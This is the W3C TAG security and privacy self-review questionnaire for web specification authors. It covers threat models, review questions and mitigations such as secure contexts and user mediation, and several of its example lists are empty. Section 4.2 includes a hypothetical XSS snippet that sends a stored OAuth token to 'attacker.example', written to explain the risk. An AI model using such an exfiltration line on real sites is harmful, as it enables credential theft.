Self-Review Questionnaire: Security and Privacy

A Collection of Interesting Ideas,

This version:
https://w3ctag.github.io/security-questionnaire/
Version History:
https://github.com/w3ctag/security-questionnaire/commits/master/index.src.html
Issue Tracking:
GitHub
Inline In Spec
Editor:
(Independent researcher)
Former Editor:
(Google Inc.)
Bug Reports:
via the w3ctag/security-questionnaire repository on GitHub

Abstract

This document provides a set of points to help in considering the privacy impact of a new feature or specification, as well as common mitigation strategies for common privacy impacts. The questions are meant to be useful when considering the security and privacy aspects of a new feature or specification, and the mitigation strategies are meant to assist in the design of the feature or specification. Authors of a new proposal or feature should implement the mitigations as appropriate; doing so will assist in addressing the respective points in the questionnaire. Given the variety and nature of specifications, it is likely that the listed questions will not be comprehensive enough to reason about the full privacy impact, and some mitigations may not be appropriate, or other mitigations may be necessary. The aim is nonetheless to present the questions and mitigations as a starting point, helping to consider security and privacy at the start of work on a new feature, and throughout the lifecycle of a feature.

It is not meant as a "security checklist", nor does an editor or group’s use of this questionnaire obviate the editor or group’s responsibility to obtain "wide review" of a specification’s security and privacy properties before publication. Furthermore, the filled questionnaire should not be understood as the security and privacy considerations sections themselves, although parts of the answers may be relevant when drafting those considerations.

1. Introduction

New features make the web a stronger and livelier platform. Throughout the feature development process — planning, drafting, and implementing — there are both foreseeable and unexpected security and privacy risks. These risks may arise from the nature of the feature, some of its parts, or unforeseen interactions with other features, and may be mitigated through careful design and consideration of security and privacy design patterns.

Standardizing web features presents unique challenges as, inherently, the web standardization process requires multiple independent implementations of a feature. As a result, descriptions, protocols, and algorithms need to be specified precisely so that they can be broadly adopted by vendors with large user bases.

A user agent is the user’s agent, and it is important that feature authors consider that if their feature carries privacy risks, user agents may implement the feature in a compatibility-breaking way to protect user privacy. This is especially true when features are not clearly defined, or when privacy exposures are identified but left unmitigated (or left to user agents to mitigate): vendors may then implement their own compatibility-breaking mitigations, which puts wide adoption of the feature at risk.

This is why each Working Group needs to consider security and privacy by default. This consideration is mandatory. Furthermore, assessing the impact of a mechanism on privacy should be done from the ground up, during each iteration of the specification. The questionnaire and guidance presented here are meant to help authors consider security and privacy in their feature as early as possible, beginning with ideation in Community Groups and continuing through formalization in Working Groups. The guidance should help authors develop standards that are private by default, allowing the questionnaire to be addressed simply and straightforwardly.

Providing adequate and informative answers to the questions, such as providing context or explaining the reasoning behind certain choices, will also help in the wide security and privacy review performed later on, within the W3C review process and beyond.

This document encourages early review by posing a number of questions that you, as an individual reader, writer, or contributor to a specification, can ask, and that working groups and spec editors need to consider, before asking for a more formal review. The intent is to highlight areas which have historically had interesting implications for users’ security or privacy, and thereby to focus the attention of editors, working groups, and reviewers on areas that might previously have been overlooked.

This document does not attempt to define what privacy is (in a Web context). Instead, privacy is the sum of what is contained in this document. This may not be exactly what most readers would typically assume, but privacy is a complicated concept with a rich history that spans many disciplines, and there remains confusion over its meaning.

The audience of this document is general:

2. How To Use The Questionnaire

Thinking about security and privacy risks and mitigations early in a project is the best approach, as it helps ensure the privacy of your feature at an architectural level and ensures that the resulting descriptions, protocols, and algorithms incorporate privacy by default, rather than relying on possible implementation-level mitigations.

The Privacy Interest Group (PING) recommends that a feature group review the guidance and questionnaire when first considering their feature and meet with PING at that time to discuss any questions they have about how the guidance/questionnaire intersects with their feature at a conceptual level. After the feature group has developed their feature with the guidance/questionnaire informing their development process, the group should bring an early draft of their feature specification, with a privacy considerations section, to PING for review. From there the feature group should iterate on their design.

When requesting a Technical Architecture Group review, include the filled questionnaire, along with a description of changes or observations made during the design process. This allows external reviewers to understand the rationale, as well as the challenges and evolution of the feature, with respect to security and privacy.

It is understandable that developers may not always have the necessary data to see the broader picture and possible implications, for example in relation to other existing web functionality. The answers to the questionnaire are meant as help and input for the people who will make security and privacy remarks or perform the assessment.

3. Threat Models

To consider security and privacy it is convenient to think in terms of threat models, a way to illuminate the possible risks.

There are some concrete privacy concerns that should be considered when developing a feature for the web platform:

In the mitigations section, this document outlines a number of techniques that can be applied to mitigate these risks.

Enumerated below are some broad classes of threats that should be considered when developing a web feature.

3.1. Passive Network Attackers

A passive network attacker has read-access to the bits going over the wire between users and the servers they’re communicating with. She can’t modify the bytes, but she can collect and analyze them.

Due to the decentralized nature of the internet, and the general level of interest in user activity, it’s reasonable to assume that practically every unencrypted bit that’s bouncing around the network of proxies, routers, and servers you’re using right now is being read by someone. It’s equally likely that some of these attackers are doing their best to understand the encrypted bits as well, including storing encrypted communications for later cryptanalysis (though that requires significantly more effort).

3.2. Active Network Attackers

An active network attacker has both read- and write-access to the bits going over the wire between users and the servers they’re communicating with. She can collect and analyze data, but also modify it in-flight, injecting and manipulating JavaScript, HTML, and other content at will. This is more common than you might expect, for both benign and malicious purposes:

3.3. Same-Origin Policy Violations

The same-origin policy is the cornerstone of security on the web; one origin should not have direct access to another origin’s data (the policy is more formally defined in Section 3 of [RFC6454]). A corollary to this policy is that an origin should not have direct access to data that isn’t associated with any origin: the contents of a user’s hard drive, for instance. Various kinds of attacks bypass this protection in one way or another. For example:
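As a minimal, non-normative sketch of the policy in action: a page on one origin attempts to read a resource from another origin, and, absent an explicit opt-in such as CORS [CORS], the user agent refuses to expose the response (the hostnames below are placeholders):

    // Script running on https://example.com; https://other.example is a different origin.
    // Without CORS headers from the other origin, the response body is not readable.
    fetch("https://other.example/private-data.json")
      .then(response => response.json())
      .then(data => console.log("readable only with a CORS opt-in:", data))
      .catch(err => {
        // The user agent blocks the cross-origin read and surfaces a network error.
        console.log("blocked by the same-origin policy:", err);
      });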

3.4. Third-Party Tracking

Part of the power of the web is its ability for a page to pull in content from other third parties — from images to JavaScript — to enhance the content and/or a user’s experience of the site. However, when a page pulls in content from third parties, it inherently leaks some information to those third parties: referrer information and other data that may be used to track and profile a user. This includes the fact that cookies go back to the domain that initially stored them, allowing for cross-origin tracking. Moreover, third parties can gain execution power through third-party JavaScript being included by a webpage. While pages can take steps to mitigate the risks of third-party content, and browsers may differentiate how they treat first- and third-party content from a given page, the risk of new functionality being executed by third parties rather than by the first-party site should be considered in the feature development process.
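As a non-normative illustration, a page that deliberately embeds third-party content can reduce some of this leakage, for example by omitting credentials and referrer information on requests to a third-party host (the host below is a placeholder):

    // Fetch a third-party resource without attaching that party’s cookies
    // and without leaking the embedding page’s URL in the Referer header.
    fetch("https://third-party.example/widget.js", {
      credentials: "omit",
      referrerPolicy: "no-referrer"
    });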

3.5. Legitimate Misuse

Even when powerful features are made available to developers, it does not mean that all uses are a good idea or justified; in fact, data privacy regulations around the world may even put limits on certain uses of data. In a first-party context, a legitimate website is potentially able to use powerful features to learn about the user’s behavior or habits. For example:

This point is admittedly different from the others. It underlines that even if something is possible, it does not mean it should always be done, and it may call for a privacy impact assessment or even an ethical assessment. When designing a specification with security and privacy in mind, both use and misuse cases should be in scope.

4. Questions to Consider

4.1. How does the specification deal with personal information that allows singling out the user?

Personal data are information relating to individuals. Singling out the user is possible when some unique information or traits are collected. For example, personal data may allow singling out an individual on its own, or in combination with other information that identifies a specific person. The exact definition of what is considered PII varies around the world and is rapidly evolving, but it may include, among other things, a home address, an email address, birthdates, usernames, fingerprints, biometric data, and health information, but also identifiers such as cookies and IP addresses, as well as health status, preferences, affinities, beliefs, and much more, depending on the context.

If the specification under consideration exposes personal data to the web, it’s important to consider ways to mitigate the impacts. For instance:

If the specification deals with or introduces identifiers (persistent or not), the process should be documented, along with the nature of the identifier and its lifetime, whether it is limited to a particular origin or not.

4.2. How does this specification deal with high-value data?

Data which isn’t personally-identifiable can still be quite valuable. Sign-in credentials (like username/password pairs, or OAuth refresh tokens) can be extremely powerful in the wrong hands, as can financial instruments like credit card data. Making this data available to JavaScript, for instance, could expose it to XSS attacks and active network attackers who could inject code to read and exfiltrate the data. For instance:
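As a hypothetical sketch of the risk: once script injection is possible, any credential reachable from JavaScript can be exfiltrated (the storage key and attacker host below are invented for illustration):

    // Hypothetical XSS payload: if an OAuth token is readable from script,
    // injected code can forward it to an attacker-controlled host.
    const token = localStorage.getItem("oauth-refresh-token");
    if (token !== null) {
      navigator.sendBeacon("https://attacker.example/collect", token);
    }
    // Credentials kept out of reach of script (for example in HttpOnly cookies)
    // are not exposed to this class of attack.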

4.3. Might this specification introduce new state for an origin that persists across browsing sessions?

For example:

4.4. Does this specification expose persistent, cross-origin state to the web?

For example:

4.5. Does this specification expose any other data to an origin that it doesn’t currently have access to?

As noted above in §3.3 Same-Origin Policy Violations, the same-origin policy is an important security barrier that new features need to carefully consider. If a specification exposes details about another origin’s state, or allows POST or GET requests to be made to another origin, the consequences can be severe.

4.6. Does this specification enable new script execution/loading mechanisms?

4.7. Does this specification allow an origin access to a user’s location?

A user’s location is highly-desirable information for a variety of use cases. It is also, understandably, information which many users are reluctant to share, as it can be both highly identifying, and potentially creepy. New features which make use of geolocation information, or which expose it to the web in new ways should carefully consider the ways in which the risks of unfettered access to a user’s location could be mitigated. For instance:
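For example, the [GEOLOCATION-API] gates access on a permission prompt, and a site can request only the accuracy it needs; a non-normative sketch (the button selector is illustrative):

    // Request the user’s position only in response to a clear user action,
    // and avoid asking for high-accuracy data when coarse data suffices.
    document.querySelector("#find-store").addEventListener("click", () => {
      navigator.geolocation.getCurrentPosition(
        position => {
          console.log("position:", position.coords.latitude, position.coords.longitude);
        },
        error => {
          // The user declined or the position is unavailable; degrade gracefully.
          console.log("no position available:", error.message);
        },
        { enableHighAccuracy: false, maximumAge: 600000 }
      );
    });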

4.8. Does this specification allow an origin access to sensors on a user’s device?

Powerful features that allow querying information about the user’s system or environment may open up interesting new use cases, while also expanding risks and changing threat models. Examples of new features of this kind include sensors and communication channels such as Bluetooth or USB.

4.9. Does this specification allow an origin access to aspects of a user’s local computing environment?

Features that allow modifying or querying screen sizes or installed fonts may be useful, but in some contexts they may introduce risks. Additionally, functionality that makes it possible to reason about the user’s computing environment, for example by means of Bluetooth or USB, should be accounted for, whether the identifiers employed are long-term or not.

4.10. Does this specification allow an origin access to other devices?

Accessing other devices, both via network connections and via direct connection to the user’s machine (e.g. via Bluetooth, NFC, or USB), could expose vulnerabilities: some of these devices were not created with web connectivity in mind and may be inadequately hardened against malicious input, or against use on the web.
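For instance, Web Bluetooth only exposes a device after the user has picked it from a chooser; a non-normative sketch (the service filter is illustrative, and the call must come from a user gesture):

    // Device access is mediated by a user-facing chooser; only the device the
    // user selects, matching the requested filters, is exposed to the origin.
    navigator.bluetooth.requestDevice({ filters: [{ services: ["battery_service"] }] })
      .then(device => console.log("user selected:", device.name))
      .catch(err => console.log("no device selected:", err.message));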

4.11. Does this specification allow an origin some measure of control over a user agent’s native UI?

This concerns interaction with the UI, such as modification of the browser display, or even things like displaying a common pop-up with origin-controlled input, such as Notifications.
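For example, the Notifications API only displays origin-controlled content in native UI after the user has granted permission; a non-normative sketch:

    // Origin-controlled text reaches the native UI only after the user has
    // explicitly granted the notifications permission.
    Notification.requestPermission().then(permission => {
      if (permission === "granted") {
        new Notification("Example", { body: "Origin-controlled text in native UI" });
      }
    });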

4.12. Does this specification expose temporary identifiers to the web?

Some identifiers may be difficult to pinpoint, but they revolve around information that is stable over the short term (seconds, minutes, days) and may be available to web origins, whether in a cross-origin or even a cross-browser manner.

4.13. Does this specification distinguish between behavior in first-party and third-party contexts?

4.14. How does this specification work in the context of a user agent’s Private Browsing Mode?

Some web features behave differently in private browsing modes (with respect to normal browsing modes). This is not always desirable. Features should work in such a way that a website is not able to determine that the user is in a private browsing mode. This includes graceful degradation: when a feature stops functioning, it should do so in a way that still does not reveal the browsing mode.

Some examples:
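As one non-normative sketch of graceful degradation: a site can handle a storage failure without attempting to infer why storage is unavailable (quota, user settings, or a private browsing mode); the helper and map below are illustrative:

    // Fall back to in-memory state if persistent storage is unavailable,
    // without trying to distinguish the reason for the failure.
    const sessionPreferences = new Map();
    function rememberPreference(key, value) {
      try {
        localStorage.setItem(key, value);
      } catch (e) {
        sessionPreferences.set(key, value);
      }
    }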

4.15. Does this specification persist data to a user’s local device?

User agents are able to store persistent data on users’ devices. The simplest examples are browsing history, cookies, or localStorage.
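A minimal, non-normative sketch of such persistence, and of clearing it, using localStorage (the key and value are illustrative):

    // This value persists across browsing sessions for the storing origin
    // until the site or the user agent clears it.
    localStorage.setItem("last-visited-article", "/articles/42");
    console.log(localStorage.getItem("last-visited-article"));
    // Specifications introducing new persistent state should describe how
    // user agents and users can clear it.
    localStorage.removeItem("last-visited-article");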

4.16. Does this specification have a "Security Considerations" and "Privacy Considerations" section?

Documenting the various concerns and potential abuses in "Security Considerations" and "Privacy Considerations" sections of a document is a good way to help implementers and web developers understand the risks that a feature presents, and to ensure that adequate mitigations are in place. If it seems like a feature does not have security or privacy impacts, then say so inline in the spec section for that feature:

There are no known security or privacy impacts of this feature.

Saying so explicitly in the specification serves several purposes:

  1. Shows that a spec author/editor has explicitly considered security and privacy when designing a feature.
  2. Provides some sense of confidence that there might be no such impacts.
  3. Challenges security and privacy minded individuals to think of and find even the potential for such impacts.
  4. Demonstrates the spec author/editor’s receptivity to feedback about such impacts.
  5. Demonstrates a desire that the specification should not introduce security and privacy issues.

When saying this, however, the crucial aspect is to actually consider security and privacy. All new specifications must have security and privacy considerations sections to be considered for wide review. Interesting features added to the web platform have generally had security and/or privacy impacts.

4.17. Does this specification allow downgrading default security characteristics?

4.18. Does this specification allow the persistent monitoring of user behavior?

Users on the web can be monitored in a variety of ways, for example via access to sensors that potentially provide mobility patterns (e.g. accelerometer, light sensor, Web Bluetooth), or directly on the web, such as by monitoring mouse movement, which is biometric data conveying rich information.

5. Mitigation Strategies

5.1. Secure Contexts

In the presence of an active network attacker, offering a feature to an insecure origin is the same as offering that feature to every origin (as the attacker can inject frames and code at will). Requiring an encrypted and authenticated connection in order to use a feature can mitigate this kind of risk.
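Specifications commonly express this restriction in Web IDL with the [SecureContext] extended attribute; from script, the effect can be observed as the feature simply not being exposed on insecure origins. A non-normative sketch (the service worker script path is illustrative):

    // Service workers [SERVICE-WORKERS] are one example of a feature gated on
    // secure contexts; on an insecure origin the API is not exposed at all.
    if (window.isSecureContext && "serviceWorker" in navigator) {
      navigator.serviceWorker.register("/sw.js");
    }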

5.2. Explicit user mediation

If a feature has privacy or security impacts that are endemic to the feature itself, then one valid strategy for exposing it to the web is to require user mediation before granting an origin access. For instance, [GEOLOCATION-API] reveals a user’s location, and wouldn’t be particularly useful if it didn’t; user agents generally gate access to the feature on a permission prompt which the user may choose to accept.

Designing such prompts is difficult. Choosers are good. Walls of text are bad.
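As a non-normative sketch, a site can check the current permission state and only trigger a prompt in response to a clearly labelled user action (the helper functions below are hypothetical):

    // Query the state of the geolocation permission and only prompt the user
    // from an explicit gesture if no decision has been made yet.
    navigator.permissions.query({ name: "geolocation" }).then(status => {
      if (status.state === "granted") {
        startUsingLocation();   // hypothetical helper
      } else if (status.state === "prompt") {
        showLocationButton();   // hypothetical helper: prompt only on click
      }
    });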

Bring in some of felt@'s ideas here.

5.3. Drop the feature

The simplest way to mitigate potential negative security or privacy impacts of a feature, and one that is at least worth discussing, is to drop the feature. Every feature in a spec should be considered guilty (of harming security and/or privacy) until proven otherwise.

Every specification should seek to be as small as possible, even if only to reduce and minimize the security/privacy attack surface.

By doing so we can reduce the overall security (and privacy) attack surface of not only a particular feature, but of a module (related set of features), a specification, and the overall web platform.

Examples

6. How to Use the Questionnaire

To ensure good designs, security and privacy should be considered as early as possible. This questionnaire facilitates that: the questions should be considered early in the specification development process, kept in mind as the specification matures, and the answers should be updated as the specification evolves. This questionnaire should not be used as a “check box” exercise before requesting final publication; acting in this manner does not help improve privacy or security on the Web. Each question needs to be considered, and any privacy or security concerns should be described, along with a possible mitigation strategy. It is not a good approach to provide a one-word answer (“yes” / “no”). Rather, it is expected to include an explanatory description. The questions in the questionnaire are more about “why” and “how”, rather than “if”.

It is expected that the questionnaire will be filled in prior to obtaining W3C Working Draft status, and prior to requesting a review, in line with Privacy by Design principles. The questionnaire and its answers should not be included in the specification itself. It is preferable to keep them in a standard and easily available place, with a link available in the TAG repository.

Conformance

Conformance requirements are expressed with a combination of descriptive assertions and RFC 2119 terminology. The key words “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in the normative parts of this document are to be interpreted as described in RFC 2119. However, for readability, these words do not appear in all uppercase letters in this specification.

All of the text of this specification is normative except sections explicitly marked as non-normative, examples, and notes. [RFC2119]

Examples in this specification are introduced with the words “for example” or are set apart from the normative text with class="example", like this:

This is an example of an informative example.

Informative notes begin with the word “Note” and are set apart from the normative text with class="note", like this:

Note, this is an informative note.

Index

Terms defined by this specification

Terms defined by reference

References

Normative References

[RFC2119]
S. Bradner. Key words for use in RFCs to Indicate Requirement Levels. March 1997. Best Current Practice. URL: https://tools.ietf.org/html/rfc2119
[SVG2]
Amelia Bellamy-Royds; et al. Scalable Vector Graphics (SVG) 2. 4 October 2018. CR. URL: https://www.w3.org/TR/SVG2/

Informative References

[BEACON]
Ilya Grigorik; et al. Beacon. 13 April 2017. CR. URL: https://www.w3.org/TR/beacon/
[CORS]
Anne van Kesteren. Cross-Origin Resource Sharing. 16 January 2014. REC. URL: https://www.w3.org/TR/cors/
[CSP]
Mike West. Content Security Policy Level 3. 13 September 2016. WD. URL: https://www.w3.org/TR/CSP3/
[GEOFENCING]
Marijn Kruisselbrink. Geofencing API. 30 May 2017. NOTE. URL: https://www.w3.org/TR/geofencing/
[GEOLOCATION-API]
Andrei Popescu. Geolocation API Specification 2nd Edition. 8 November 2016. REC. URL: https://www.w3.org/TR/geolocation-API/
[HTML-IMPORTS]
Dimitri Glazkov; Hajime Morita. HTML Imports. 25 February 2016. WD. URL: https://www.w3.org/TR/html-imports/
[RFC6454]
A. Barth. The Web Origin Concept. December 2011. Proposed Standard. URL: https://tools.ietf.org/html/rfc6454
[RFC7258]
S. Farrell; H. Tschofenig. Pervasive Monitoring Is an Attack. May 2014. Best Current Practice. URL: https://tools.ietf.org/html/rfc7258
[SERVICE-WORKERS]
Alex Russell; et al. Service Workers 1. 2 November 2017. WD. URL: https://www.w3.org/TR/service-workers-1/
[WEBMESSAGING]
Ian Hickson. HTML5 Web Messaging. 19 May 2015. REC. URL: https://www.w3.org/TR/webmessaging/

Issues Index

Bring in some of felt@'s ideas here.